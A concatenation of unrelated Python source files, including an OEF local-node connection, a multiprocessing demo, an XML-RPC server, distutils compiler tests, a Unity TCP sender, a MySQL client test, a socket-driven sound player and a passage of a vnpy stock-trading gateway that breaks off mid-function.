performative=OefSearchMessage.Performative.OEF_ERROR,
target_message=oef_search_msg,
oef_error_operation=OefSearchMessage.OefErrorOperation.UNREGISTER_SERVICE,
)
envelope = Envelope(to=msg.to, sender=msg.sender, message=msg,)
await self._send(envelope)
else:
self.services[address].remove(service_description)
if len(self.services[address]) == 0:
self.services.pop(address)
async def _search_services(
self, oef_search_msg: OefSearchMessage, dialogue: OefSearchDialogue,
) -> None:
"""
Search the agents in the local Service Directory, and send back the result.
This is actually a dummy search, it will return all the registered agents with the specified data model.
If the data model is not specified, it will return all the agents.
:param oef_search_msg: the message.
:param dialogue: the dialogue.
:return: None
"""
with self._lock:
query = oef_search_msg.query
result = [] # type: List[str]
if query.model is None:
result = list(set(self.services.keys()))
else:
for agent_address, descriptions in self.services.items():
for description in descriptions:
if description.data_model == query.model:
result.append(agent_address)
msg = dialogue.reply(
performative=OefSearchMessage.Performative.SEARCH_RESULT,
target_message=oef_search_msg,
agents=tuple(sorted(set(result))),
)
envelope = Envelope(to=msg.to, sender=msg.sender, message=msg,)
await self._send(envelope)
def _get_message_and_dialogue(
self, envelope: Envelope
) -> Tuple[OefSearchMessage, Optional[OefSearchDialogue]]:
"""
Get a message copy and dialogue related to this message.
:param envelope: incoming envelope
:return: Tuple[Message, Optional[Dialogue]]
"""
if self._dialogues is None: # pragma: nocover
raise ValueError("Call connect before!")
message = cast(OefSearchMessage, envelope.message)
dialogue = cast(Optional[OefSearchDialogue], self._dialogues.update(message))
return message, dialogue
async def _send(self, envelope: Envelope) -> None:
"""Send a message."""
destination = envelope.to
destination_queue = self._out_queues[destination]
destination_queue._loop.call_soon_threadsafe(destination_queue.put_nowait, envelope) # type: ignore # pylint: disable=protected-access
self.logger.debug("Send envelope {}".format(envelope))
async def disconnect(self, address: Address) -> None:
"""
Disconnect.
:param address: the address of the agent
:return: None
"""
with self._lock:
self._out_queues.pop(address, None)
self.services.pop(address, None)
class OEFLocalConnection(Connection):
"""
Proxy to the functionality of the OEF.
It allows the interaction between agents, but not the search functionality.
It is useful for local testing.
"""
connection_id = PUBLIC_ID
def __init__(self, local_node: Optional[LocalNode] = None, **kwargs: Any) -> None:
"""
Load the connection configuration.
Initialize a OEF proxy for a local OEF Node
:param local_node: the Local OEF Node object. This reference must be the same across the agents of interest. (Note, AEA loader will not accept this argument.)
"""
super().__init__(**kwargs)
self._local_node = local_node
self._reader = None # type: Optional[Queue]
self._writer = None # type: Optional[Queue]
async def connect(self) -> None:
"""Connect to the local OEF Node."""
if self._local_node is None: # pragma: nocover
raise ValueError("No local node set!")
if self.is_connected: # pragma: nocover
return
with self._connect_context():
self._reader = Queue()
self._writer = await self._local_node.connect(self.address, self._reader)
async def disconnect(self) -> None:
"""Disconnect from the local OEF Node."""
if self._local_node is None:
raise ValueError("No local node set!") # pragma: nocover
if self.is_disconnected:
return # pragma: nocover
self.state = ConnectionStates.disconnecting
if self._reader is None:
raise ValueError("No reader set!") # pragma: nocover
await self._local_node.disconnect(self.address)
await self._reader.put(None)
self._reader, self._writer = None, None
self.state = ConnectionStates.disconnected
async def send(self, envelope: Envelope) -> None:
"""Send a message."""
self._ensure_connected()
self._writer._loop.call_soon_threadsafe(self._writer.put_nowait, envelope) # type: ignore # pylint: disable=protected-access
async def receive(self, *args: Any, **kwargs: Any) -> Optional["Envelope"]:
"""
Receive an envelope. Blocking.
:return: the envelope received, or None.
"""
self._ensure_connected()
try:
if self._reader is None:
raise ValueError("No reader set!") # pragma: nocover
envelope = await self._reader.get()
if envelope is None: # pragma: no cover
self.logger.debug("Receiving task terminated.")
return None
self.logger.debug("Received envelope {}".format(envelope))
return envelope
except Exception: # pragma: nocover # pylint: disable=broad-except
return None
|
example2.py
|
# importing the multiprocessing module
import multiprocessing
import time
import os
def worker1():
# printing process id
time.sleep(5)
print("ID of process running worker1: {}".format(os.getpid()))
def worker2():
# printing process id
print("ID of process running worker2: {}".format(os.getpid()))
if __name__ == "__main__":
# printing main program process id
print("ID of main process: {}".format(os.getpid()))
# creating processes
p1 = multiprocessing.Process(target=worker1)
p2 = multiprocessing.Process(target=worker2)
# starting processes
p1.start()
p2.start()
# check if processes are alive
print("Process p1 is alive: {}".format(p1.is_alive()))
print("Process p2 is alive: {}".format(p2.is_alive()))
# process IDs
print("ID of process p1: {}".format(p1.pid))
print("ID of process p2: {}".format(p2.pid))
# wait until processes are finished
p1.join()
p2.join()
# both processes finished
print("Both processes finished execution!")
# check if processes are alive
print("Process p1 is alive: {}".format(p1.is_alive()))
print("Process p2 is alive: {}".format(p2.is_alive()))
|
server.py
|
from __future__ import print_function
from __future__ import absolute_import
from __future__ import division
import threading
try:
from SimpleXMLRPCServer import SimpleXMLRPCServer
except ImportError:
from xmlrpc.server import SimpleXMLRPCServer
__all__ = ['Server']
class Server(SimpleXMLRPCServer):
"""Version of a `SimpleXMLRPCServer` that can be cleanly terminated from the client side.
Examples
--------
.. code-block:: python
# service.py
from compas.rpc import Server
from compas.rpc import Dispatcher
class DefaultService(Dispatcher):
pass
if __name__ == '__main__':
server = Server(("localhost", 8888))
server.register_function(server.ping)
server.register_function(server.remote_shutdown)
server.register_instance(DefaultService())
server.serve_forever()
Notes
-----
This class has to be used by a service to start the XMLRPC server in a way
that can be pinged to check if the server is live, and can be cleanly terminated.
"""
def ping(self):
"""Simple function used to check if a remote server can be reached.
Notes
-----
Should be used together with an instance of `compas.rpc.Server`.
"""
return 1
def remote_shutdown(self):
threading.Thread(target=self._shutdown_thread).start()
return 1
def _shutdown_thread(self):
self.shutdown()
|
test_msvccompiler.py
|
"""Tests for distutils._msvccompiler."""
import sys
import unittest
import os
import threading
from distutils.errors import DistutilsPlatformError
from distutils.tests import support
from test.support import run_unittest
SKIP_MESSAGE = (None if sys.platform == "win32" else
"These tests are only for win32")
@unittest.skipUnless(SKIP_MESSAGE is None, SKIP_MESSAGE)
class msvccompilerTestCase(support.TempdirManager,
unittest.TestCase):
def test_no_compiler(self):
import distutils._msvccompiler as _msvccompiler
# makes sure query_vcvarsall raises
# a DistutilsPlatformError if the compiler
# is not found
def _find_vcvarsall(plat_spec):
return None, None
old_find_vcvarsall = _msvccompiler._find_vcvarsall
_msvccompiler._find_vcvarsall = _find_vcvarsall
try:
self.assertRaises(DistutilsPlatformError,
_msvccompiler._get_vc_env,
'wont find this version')
finally:
_msvccompiler._find_vcvarsall = old_find_vcvarsall
def test_get_vc_env_unicode(self):
import distutils._msvccompiler as _msvccompiler
test_var = 'ṰḖṤṪ┅ṼẨṜ'
test_value = '₃⁴₅'
# Ensure we don't early exit from _get_vc_env
old_distutils_use_sdk = os.environ.pop('DISTUTILS_USE_SDK', None)
os.environ[test_var] = test_value
try:
env = _msvccompiler._get_vc_env('x86')
self.assertIn(test_var.lower(), env)
self.assertEqual(test_value, env[test_var.lower()])
finally:
os.environ.pop(test_var)
if old_distutils_use_sdk:
os.environ['DISTUTILS_USE_SDK'] = old_distutils_use_sdk
def test_get_vc2017(self):
import distutils._msvccompiler as _msvccompiler
# This function cannot be mocked, so pass it if we find VS 2017
# and mark it skipped if we do not.
version, path = _msvccompiler._find_vc2017()
if version:
self.assertGreaterEqual(version, 15)
self.assertTrue(os.path.isdir(path))
else:
raise unittest.SkipTest("VS 2017 is not installed")
def test_get_vc2015(self):
import distutils._msvccompiler as _msvccompiler
# This function cannot be mocked, so pass it if we find VS 2015
# and mark it skipped if we do not.
version, path = _msvccompiler._find_vc2015()
if version:
self.assertGreaterEqual(version, 14)
self.assertTrue(os.path.isdir(path))
else:
raise unittest.SkipTest("VS 2015 is not installed")
class CheckThread(threading.Thread):
exc_info = None
def run(self):
try:
super().run()
except Exception:
self.exc_info = sys.exc_info()
def __bool__(self):
return not self.exc_info
class TestSpawn(unittest.TestCase):
def test_concurrent_safe(self):
"""
Concurrent calls to spawn should have consistent results.
"""
import distutils._msvccompiler as _msvccompiler
compiler = _msvccompiler.MSVCCompiler()
compiler._paths = "expected"
inner_cmd = 'import os; assert os.environ["PATH"] == "expected"'
command = [sys.executable, '-c', inner_cmd]
threads = [
CheckThread(target=compiler.spawn, args=[command])
for n in range(100)
]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
assert all(threads)
def test_concurrent_safe_fallback(self):
"""
If CCompiler.spawn has been monkey-patched without support
for an env, it should still execute.
"""
import distutils._msvccompiler as _msvccompiler
from distutils import ccompiler
compiler = _msvccompiler.MSVCCompiler()
compiler._paths = "expected"
def CCompiler_spawn(self, cmd):
"A spawn without an env argument."
assert os.environ["PATH"] == "expected"
with unittest.mock.patch.object(
ccompiler.CCompiler, 'spawn', CCompiler_spawn):
compiler.spawn(["n/a"])
assert os.environ.get("PATH") != "expected"
def test_suite():
return unittest.TestLoader().loadTestsFromTestCase(msvccompilerTestCase)
if __name__ == "__main__":
run_unittest(test_suite())
|
tcp_sender.py
|
# Copyright 2020 Unity Technologies
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import rospy
import socket
import time
import threading
import struct
from .client import ClientThread
from .thread_pauser import ThreadPauser
from io import BytesIO
# queue module was renamed between python 2 and 3
try:
from queue import Queue
from queue import Empty
except:
from Queue import Queue
from Queue import Empty
class UnityTcpSender:
"""
Sends messages to Unity.
"""
def __init__(self):
# if we have a valid IP at this point, it was overridden locally so always use that
self.sender_id = 1
self.time_between_halt_checks = 5
# Each sender thread has its own queue: this is always the queue for the currently active thread.
self.queue = None
self.queue_lock = threading.Lock()
# variables needed for matching up unity service requests with responses
self.next_srv_id = 1001
self.srv_lock = threading.Lock()
self.services_waiting = {}
def send_unity_info(self, text):
if self.queue is not None:
command = SysCommand_Log()
command.text = text
serialized_bytes = ClientThread.serialize_command("__log", command)
self.queue.put(serialized_bytes)
def send_unity_warning(self, text):
if self.queue is not None:
command = SysCommand_Log()
command.text = text
serialized_bytes = ClientThread.serialize_command("__warn", command)
self.queue.put(serialized_bytes)
def send_unity_error(self, text):
if self.queue is not None:
command = SysCommand_Log()
command.text = text
serialized_bytes = ClientThread.serialize_command("__error", command)
self.queue.put(serialized_bytes)
def send_ros_service_response(self, srv_id, destination, response):
if self.queue is not None:
command = SysCommand_Service()
command.srv_id = srv_id
serialized_bytes = ClientThread.serialize_command("__response", command)
self.queue.put(serialized_bytes)
self.send_unity_message(destination, response)
def send_unity_message(self, topic, message):
if self.queue is not None:
serialized_message = ClientThread.serialize_message(topic, message)
self.queue.put(serialized_message)
def send_unity_service_request(self, topic, service_class, request):
if self.queue is None:
return None
thread_pauser = ThreadPauser()
with self.srv_lock:
srv_id = self.next_srv_id
self.next_srv_id += 1
self.services_waiting[srv_id] = thread_pauser
command = SysCommand_Service()
command.srv_id = srv_id
serialized_bytes = ClientThread.serialize_command("__request", command)
self.queue.put(serialized_bytes)
self.send_unity_message(topic, request)
# rospy starts a new thread for each service request,
# so it won't break anything if we sleep now while waiting for the response
thread_pauser.sleep_until_resumed()
response = service_class._response_class().deserialize(thread_pauser.result)
return response
def send_unity_service_response(self, srv_id, data):
thread_pauser = None
with self.srv_lock:
thread_pauser = self.services_waiting[srv_id]
del self.services_waiting[srv_id]
thread_pauser.resume_with_result(data)
def send_topic_list(self):
if self.queue is not None:
topic_list = SysCommand_TopicsResponse()
topics_and_types = rospy.get_published_topics()
topic_list.topics = [item[0] for item in topics_and_types]
topic_list.types = [item[1] for item in topics_and_types]
serialized_bytes = ClientThread.serialize_command("__topic_list", topic_list)
self.queue.put(serialized_bytes)
def start_sender(self, conn, halt_event):
sender_thread = threading.Thread(
target=self.sender_loop, args=(conn, self.sender_id, halt_event)
)
self.sender_id += 1
# Exit the server thread when the main thread terminates
sender_thread.daemon = True
sender_thread.start()
def sender_loop(self, conn, tid, halt_event):
s = None
local_queue = Queue()
# send an empty message to confirm connection
# minimal message: 4 zero bytes for topic length 0, 4 zero bytes for payload length 0
local_queue.put(b"\0\0\0\0\0\0\0\0")
with self.queue_lock:
self.queue = local_queue
try:
while not halt_event.is_set():
try:
item = local_queue.get(timeout=self.time_between_halt_checks)
except Empty:
# I'd like to just wait on the queue, but we also need to check occasionally for the connection being closed
# (otherwise the thread never terminates.)
continue
# print("Sender {} sending an item".format(tid))
try:
conn.sendall(item)
except Exception as e:
rospy.logerr("Exception on Send {}".format(e))
break
finally:
halt_event.set()
with self.queue_lock:
if self.queue is local_queue:
self.queue = None
class SysCommand_Log:
text = ""
class SysCommand_Service:
srv_id = 0
class SysCommand_TopicsResponse:
topics = []
types = []
|
test_mysql_client.py
|
# Copyright 2020 The FedLearner Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# coding: utf-8
import os
import unittest
import threading
import time
from fedlearner.common import mysql_client
class TestMySQLClient(unittest.TestCase):
def test_mysql_op(self):
cli = mysql_client.DBClient('test_cluster', 'localhost:2379',
'test_user', 'test_password',
'data_source_a', True)
cli.delete('fl_key')
cli.set_data('fl_key', 'fl_value')
self.assertEqual(cli.get_data('fl_key'), b'fl_value')
self.assertFalse(cli.cas('fl_key', 'fl_value1', 'fl_value2'))
self.assertTrue(cli.cas('fl_key', 'fl_value', 'fl_value1'))
self.assertEqual(cli.get_data('fl_key'), b'fl_value1')
def thread_routine():
cli.set_data('fl_key', 'fl_value2')
self.assertEqual(cli.get_data('fl_key'), b'fl_value2')
other = threading.Thread(target=thread_routine)
other.start()
other.join()
cli.set_data('fl_key/a', '1')
cli.set_data('fl_key/b', '2')
cli.set_data('fl_key/c', '3')
expected_kvs = [(b'fl_key', b'fl_value2'), (b'fl_key/a', b'1'),
(b'fl_key/b', b'2'), (b'fl_key/c', b'3')]
for idx, kv in enumerate(cli.get_prefix_kvs('fl_key')):
self.assertEqual(kv[0], expected_kvs[idx][0])
self.assertEqual(kv[1], expected_kvs[idx][1])
for idx, kv in enumerate(cli.get_prefix_kvs('fl_key', True)):
self.assertEqual(kv[0], expected_kvs[idx+1][0])
self.assertEqual(kv[1], expected_kvs[idx+1][1])
if __name__ == '__main__':
unittest.main()
|
progSound.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pygame import mixer
import threading, random, socket
play = 0
file = 0
sock = socket.socket()
sock.bind(('', 6000))
sock.listen(1)
conn, addr = sock.accept()
#sock.settimeout(.01)
def soundPlayer(arg3, soundPlayer_stop):
global file
global play
while 1:
if play == 1:
mixer.init(16000, -16, 1, 2048)
mixer.music.load("/home/pi/r2d2/sound/"+str(file)+".MP3")
print file
mixer.music.play()
while mixer.music.get_busy() == True:
if play==0:
mixer.music.stop()
continue
file = random.randint(0, 10) #Random sound
#play = 0
soundPlayer_stop = threading.Event()
#soundPlayer=threading.Thread(target=soundPlayer)
soundPlayer=threading.Thread(target=soundPlayer, args=(2, soundPlayer_stop))
soundPlayer.start()
def simplePlay(file):
mixer.init(16000, -16, 1, 2048)
mixer.music.load("/home/pi/r2d2/sound/"+file+".MP3")
mixer.music.play()
while mixer.music.get_busy() == True:
continue
#simplePlay("ready")
print "> OK. Start!"
print '> Connected:', addr
def reStart():
global conn, addr
conn.close()
conn, addr = sock.accept()
while True:
#data = conn.recv(16384)
data = raw_input()
if not data:
print '> RESTART'
reStart()
if data == 'PLAYsound' and play == 0:
print "> Play sound"
file = str(random.randint(0, 10))
play=1 #On playing
if data == 'STOPsound':
print "> Stop sound"
play = 0
conn.close()
|
pb_gateway.py
|
# 恒投交易客户端 文件接口
# 1. 支持csv/dbf文件的读写
# 2. 采用tdx作为行情数据源
# 华富资产 李来佳 28888502
import os
import sys
import copy
import csv
import dbf
import traceback
import pandas as pd
from typing import Any, Dict, List
from datetime import datetime, timedelta
from time import sleep
from functools import lru_cache
from collections import OrderedDict
from multiprocessing.dummy import Pool
from threading import Thread
from pytdx.hq import TdxHq_API
from pytdx.config.hosts import hq_hosts
from pytdx.params import TDXParams
from vnpy.event import EventEngine
from vnpy.trader.event import EVENT_TIMER
from vnpy.trader.constant import (
Exchange,
Product,
Direction,
OrderType,
Status,
Offset,
Interval
)
from vnpy.trader.gateway import BaseGateway, LocalOrderManager
from vnpy.trader.object import (
BarData,
CancelRequest,
OrderRequest,
SubscribeRequest,
TickData,
ContractData,
OrderData,
TradeData,
PositionData,
AccountData,
HistoryRequest
)
from vnpy.trader.utility import get_folder_path, print_dict, extract_vt_symbol, get_stock_exchange, append_data
from vnpy.data.tdx.tdx_common import get_stock_type_sz, get_stock_type_sh
# 通达信股票行情
from vnpy.data.tdx.tdx_common import get_cache_config, get_tdx_market_code
# 代码 <=> 中文名称
symbol_name_map: Dict[str, str] = {}
# 代码 <=> 交易所
symbol_exchange_map: Dict[str, Exchange] = {}
# 时间戳对齐
TIME_GAP = 8 * 60 * 60 * 1000000000
INTERVAL_VT2TQ = {
Interval.MINUTE: 60,
Interval.HOUR: 60 * 60,
Interval.DAILY: 60 * 60 * 24,
}
# 功能<->文件对应
PB_FILE_NAMES = {
'send_order': 'XHPT_WT', # 通用接口_委托
'cancel_order': 'XHPT_CD', # 通用接口_撤单
'update_orders': 'XHPT_WTCX', # 通用接口_委托查询
'update_trades': 'XHPT_CJCX', # 通用接口_成交查询
'positions': 'CC_STOCK_', # 持仓明细
'orders': 'WT_STOCK_', # 当日委托明细
'trades': 'CJ_STOCK_', # 当日成交明细
'accounts': 'ZJ_STOCK_' # 资金
}
SEND_ORDER_FIELDS = OrderedDict({
"CPBH": "C32", # 产品代码/基金代码 <-- 输入参数 -->
"ZCDYBH": "C16", # 单元编号/组合编号
"ZHBH": "C16", # 组合编号
"GDDM": "C20", # 股东代码
"JYSC": "C3", # 交易市场
"ZQDM": "C16", # 证券代码
"WTFX": "C4", # 委托方向
"WTJGLX": "C1", # 委托价格类型
"WTJG": "N11.4", # 委托价格
"WTSL": "N12", # 委托数量
"WBZDYXH": "N9", # 第三方系统自定义号
"WTXH": "N8", # 委托序号 <-- 输出参数 -->
"WTSBDM": "N8", # 委托失败代码
"SBYY": "C254", # 失败原因
"CLBZ": "C1", # 处理标志 <-- 内部自用字段 -->
"BYZD": "C2", # 备用字段
"WTJE": "N16.2", # 委托金额 <-- 扩充参数 -->
"TSBS": "C64", # 特殊标识
"YWBS": "C2", # 业务标识
})
# 撤单csv字段格式定义
CANCEL_ORDER_FIELDS = OrderedDict({
"WTXH": "N8", # 委托序号
"JYSC": "C3", # 交易市场
"ZQDM": "C16", # 证券代码
"CDCGBZ": "C1", # 撤单成功标志
"SBYY": "C254", # 失败原因
"CLBZ": "C1", # 处理标志
"BYZD": "C2", # 备用字段
"BYZD2": "C16", # 备用字段2
})
# 通用接口_委托查询
UPDATE_ORDER_FIELDS = OrderedDict({
"WTRQ": "N8", # 委托日期
"WTSJ": "N6", # 委托时间
"WTXH": "N8", # 委托序号
"WBZDYXH": "N9", # 第三方系统自定义号
"CPBH": "C32", # 产品(账户)编号
"ZCDYBH": "C16", # 资产单元编号
"ZHBH": "C16", # 组合编号
"GDDM": "C20", # 股东代码
"JYSC": "C3", # 交易市场
"ZQDM": "C16", # 证券代码
"WTFX": "C4", # 委托方向
"WTJGLX": "C1", # 委托价格类型
"WTJG": "N11.4", # 委托价格
"WTSL": "N12", # 委托数量
"YMDJJE": "N16.2", # 预买冻结金额
"YMSRJE": "N16.2", # 预卖收入金额
"WTZT": "C1", # 委托状态
"WTCCSL": "N12", # 委托撤成数量
"FDYY": "C254", # 废单原因
"JYSSBBH": "C64", # 交易所申报编号
"CLBZ": "C1", # 处理标志
"BYZD": "C2", # 备用字段
"WTJE": "N16.2", # 委托金额
"TSBS": "C64", # 特殊标识
})
# 通用接口_成交查询
UPDATE_TRADE_FIELDS = OrderedDict({
"CJRQ": "N8", # 成交日期
"CJBH": "C64", # 成交序号
"WTXH": "N8", # 委托序号
"WBZDYXH": "N9", # 第三方系统自定义号
"CPBH": "C32", # 产品(账户)编号
"ZCDYBH": "C16", # 资产单元编号
"ZHBH": "C16", # 组合编号
"GDDM": "C20", # 股东代码
"JYSC": "C3", # 交易市场
"ZQDM": "C16", # 证券代码
"WTFX": "C4", # 委托方向
"CJSL": "N16", # 成交数量
"CJJG": "N11.4", # 成交价格
"CJJE": "N16.2", # 成交金额
"ZFY": "N16.2", # 总费用
"CJSJ": "N6", # 成交时间
"CLBZ": "C1", # 处理标志
"BYZD": "C2", # 备用字段
"TSBS": "C64", # 特殊标识
"JYSCJBH": "C64", # 成交编号
})
# 交易所id <=> Exchange
EXCHANGE_PB2VT: Dict[str, Exchange] = {
"1": Exchange.SSE,
"2": Exchange.SZSE,
"3": Exchange.SHFE,
"4": Exchange.CZCE,
"7": Exchange.CFFEX,
"9": Exchange.DCE,
"k": Exchange.INE
}
EXCHANGE_VT2PB: Dict[Exchange, str] = {v: k for k, v in EXCHANGE_PB2VT.items()}
EXCHANGE_NAME2VT: Dict[str, Exchange] = {
"上交所A": Exchange.SSE,
"深交所A": Exchange.SZSE
}
# 方向 <=> Direction, Offset
DIRECTION_STOCK_PB2VT: Dict[str, Any] = {
"1": (Direction.LONG, Offset.NONE), # 买
"2": (Direction.SHORT, Offset.NONE), # 卖
"V": (Direction.LONG, Offset.OPEN), # 多,开
"X": (Direction.SHORT, Offset.OPEN), # 空,开
"Y": (Direction.LONG, Offset.CLOSE), # 多,平
"W": (Direction.SHORT, Offset.CLOSE) # 空, 平
}
DIRECTION_STOCK_VT2PB: Dict[Any, str] = {v: k for k, v in DIRECTION_STOCK_PB2VT.items()}
DIRECTION_STOCK_NAME2VT: Dict[str, Any] = {
"卖出": Direction.SHORT,
"买入": Direction.LONG,
"债券买入": Direction.LONG,
"债券卖出": Direction.SHORT,
"申购": Direction.LONG
}
DIRECTION_ORDER_PB2VT: Dict[str, Any] = {
"1": Direction.LONG,
"2": Direction.SHORT,
"3": Direction.LONG,
"4": Direction.SHORT
}
# 持仓方向 <=> Direction
POSITION_DIRECTION_PB2VT = {
"1": Direction.LONG,
"2": Direction.SHORT,
}
# 委托单类型
ORDERTYPE_PB2VT: Dict[str, OrderType] = {
"0": OrderType.LIMIT, # 限价单
"a": OrderType.MARKET, # 五档即成剩撤(上交所市价)
"b": OrderType.MARKET, # 五档即成剩转(上交所市价)
"A": OrderType.MARKET, # 五档即成剩撤(深交所市价)
"C": OrderType.MARKET, # 即成剩撤(深交所市价)
"D": OrderType.MARKET, # 对手方最优(深交所市价,上交所科创板市价)
"E": OrderType.MARKET, # 本方最优(深交所市价,上交所科创板市价)
}
def format_dict(d, dict_define):
"""根据dict格式定义进行value转换"""
for k in dict_define.keys():
# 原值
v = d.get(k, '')
# 目标转换格式
v_format = dict_define.get(k, None)
if v_format is None:
continue
if 'C' in v_format:
str_len = int(v_format.replace('C', ''))
new_v = '{}{}'.format(' ' * (str_len - len(v)), v)
d.update({k: new_v})
continue
elif "N" in v_format:
v_format = v_format.replace('N', '')
if '.' in v_format:
int_len, float_len = v_format.split('.')
int_len = int(int_len)
float_len = int(float_len)
str_v = str(v)
new_v = '{}{}'.format(' ' * (int_len - len(str_v)), str_v)
else:
int_len = int(v_format)
str_v = str(v)
new_v = '{}{}'.format(' ' * (int_len - len(str_v)), str_v)
d.update({k: new_v})
return d
def get_pb_order_type(exchange, order_type):
"""获取pb的委托类型"""
# 限价单
if order_type == OrderType.LIMIT:
return "0"
# 市价单
if exchange == Exchange.SSE:
return "a"
if exchange == Exchange.SZSE:
return "C"
return "0"
ORDERTYPE_NAME2VT: Dict[str, OrderType] = {
"五档即成剩撤": OrderType.MARKET,
"五档即成剩转": OrderType.MARKET,
"即成剩撤": OrderType.MARKET,
"对手方最优": OrderType.MARKET,
"本方最优": OrderType.MARKET,
"限价单": OrderType.LIMIT,
}
STATUS_NAME2VT: Dict[str, Status] = {
"未报": Status.SUBMITTING,
"待报": Status.SUBMITTING,
"正报": Status.SUBMITTING,
"已报": Status.NOTTRADED,
"废单": Status.REJECTED,
"部成": Status.PARTTRADED,
"已成": Status.ALLTRADED,
"部撤": Status.CANCELLED,
"已撤": Status.CANCELLED,
"待撤": Status.CANCELLING,
"未审批": Status.UNKNOWN,
"审批拒绝": Status.UNKNOWN,
"未审批即撤销": Status.UNKNOWN,
}
STATUS_PB2VT: Dict[str, Status] = {
"1": Status.SUBMITTING,
"2": Status.SUBMITTING,
"3": Status.SUBMITTING,
"4": Status.NOTTRADED,
"5": Status.REJECTED,
"6": Status.PARTTRADED,
"7": Status.ALLTRADED,
"8": Status.CANCELLED,
"9": Status.CANCELLED,
"a": Status.CANCELLING,
"b": Status.UNKNOWN,
"c": Status.UNKNOWN,
"d": Status.UNKNOWN,
}
STOCK_CONFIG_FILE = 'tdx_stock_config.pkb2'
class PbGateway(BaseGateway):
default_setting: Dict[str, Any] = {
"资金账号": "",
"数据目录": "",
"产品编号": "",
"单元编号": "",
"股东代码_沪": "",
"股东代码_深": "",
"文件格式": "dbf",
"导出子目录": "数据导出",
"pb版本": "2018"
}
# 接口支持得交易所清单
exchanges: List[Exchange] = list(EXCHANGE_VT2PB.keys())
def __init__(self, event_engine: EventEngine, gateway_name='PB'):
""""""
super().__init__(event_engine, gateway_name=gateway_name)
self.connect_time = datetime.now().strftime("%H%M")
self.order_manager = LocalOrderManager(self, self.connect_time, 4)
self.md_api = PbMdApi(self)
self.td_api = PbTdApi(self)
self.tq_api = None
self.tdx_connected = False # 通达信行情API得连接状态
self.file_type = 'dbf'
self.pb_version = '2018'
def connect(self, setting: dict) -> None:
""""""
userid = setting["资金账号"]
csv_folder = setting["数据目录"]
product_id = setting["产品编号"]
unit_id = setting["单元编号"]
holder_ids = {
Exchange.SSE: setting["股东代码_沪"],
Exchange.SZSE: setting["股东代码_深"]
}
self.file_type = setting.get('文件格式', 'dbf')
self.pb_version = setting.get('pb版本', '2018')
# 2019版,导出目录,自动增加一个‘数据导出’的子文件夹
# 2018版,导出目录,无自动增加的子目录
export_sub_folder = setting.get('导出子目录', '数据导出')
if len(export_sub_folder) > 0:
# 2019款
export_folder = os.path.abspath(os.path.join(csv_folder, export_sub_folder))
else:
# 2018款
export_folder = csv_folder
self.md_api.connect()
self.td_api.connect(user_id=userid,
order_folder=csv_folder,
account_folder=export_folder,
product_id=product_id,
unit_id=unit_id,
holder_ids=holder_ids)
#self.tq_api = TqMdApi(self)
#self.tq_api.connect()
self.init_query()
def close(self) -> None:
""""""
self.md_api.close()
self.td_api.close()
def subscribe(self, req: SubscribeRequest) -> None:
""""""
if self.tq_api and self.tq_api.is_connected:
self.tq_api.subscribe(req)
else:
self.md_api.subscribe(req)
def send_order(self, req: OrderRequest) -> str:
""""""
return self.td_api.send_order(req)
def cancel_order(self, req: CancelRequest) -> None:
""""""
self.td_api.cancel_order(req)
def query_account(self) -> None:
""""""
self.td_api.query_account()
def query_position(self) -> None:
""""""
self.td_api.query_position()
def query_orders(self) -> None:
self.td_api.query_orders()
def query_trades(self) -> None:
self.td_api.query_trades()
def process_timer_event(self, event) -> None:
""""""
self.count += 1
if self.count < 2:
return
self.count = 0
func = self.query_functions.pop(0)
func()
self.query_functions.append(func)
def init_query(self) -> None:
""""""
self.count = 0
self.query_functions = [self.query_account, self.query_position]
self.event_engine.register(EVENT_TIMER, self.process_timer_event)
class PbMdApi(object):
def __init__(self, gateway: PbGateway):
""""""
super().__init__()
self.gateway: PbGateway = gateway
self.gateway_name: str = gateway.gateway_name
self.connect_status: bool = False
self.login_status: bool = False
self.req_interval = 0.5 # 操作请求间隔500毫秒
self.req_id = 0 # 操作请求编号
self.connection_status = False # 连接状态
self.symbol_exchange_dict = {} # tdx合约与vn交易所的字典
self.symbol_market_dict = {} # tdx合约与tdx市场的字典
self.symbol_vn_dict = {} # tdx合约与vtSymbol的对应
self.symbol_tick_dict = {} # tdx合约与最后一个Tick得字典
self.registed_symbol_set = set()
self.config = get_cache_config(STOCK_CONFIG_FILE)
self.symbol_dict = self.config.get('symbol_dict', {})
self.cache_time = self.config.get('cache_time', datetime.now() - timedelta(days=7))
self.commission_dict = {}
self.contract_dict = {}
# self.queue = Queue() # 请求队列
self.pool = None # 线程池
# self.req_thread = None # 定时器线程
# copy.copy(hq_hosts)
self.ip_list = [{'ip': "180.153.18.170", 'port': 7709},
{'ip': "180.153.18.171", 'port': 7709},
{'ip': "180.153.18.172", 'port': 80},
{'ip': "202.108.253.130", 'port': 7709},
{'ip': "202.108.253.131", 'port': 7709},
{'ip': "202.108.253.139", 'port': 80},
{'ip': "60.191.117.167", 'port': 7709},
{'ip': "115.238.56.198", 'port': 7709},
{'ip': "218.75.126.9", 'port': 7709},
{'ip': "115.238.90.165", 'port': 7709},
{'ip': "124.160.88.183", 'port': 7709},
{'ip': "60.12.136.250", 'port': 7709},
{'ip': "218.108.98.244", 'port': 7709},
# {'ip': "218.108.47.69", 'port': 7709},
{'ip': "114.80.63.12", 'port': 7709},
{'ip': "114.80.63.35", 'port': 7709},
{'ip': "180.153.39.51", 'port': 7709},
# {'ip': '14.215.128.18', 'port': 7709},
# {'ip': '59.173.18.140', 'port': 7709}
]
self.best_ip = {'ip': None, 'port': None}
self.api_dict = {} # API 的连接会话对象字典
self.last_tick_dt = {} # 记录该会话对象的最后一个tick时间
self.security_count = 50000
# 股票code name列表
self.stock_codelist = None
def ping(self, ip, port=7709):
"""
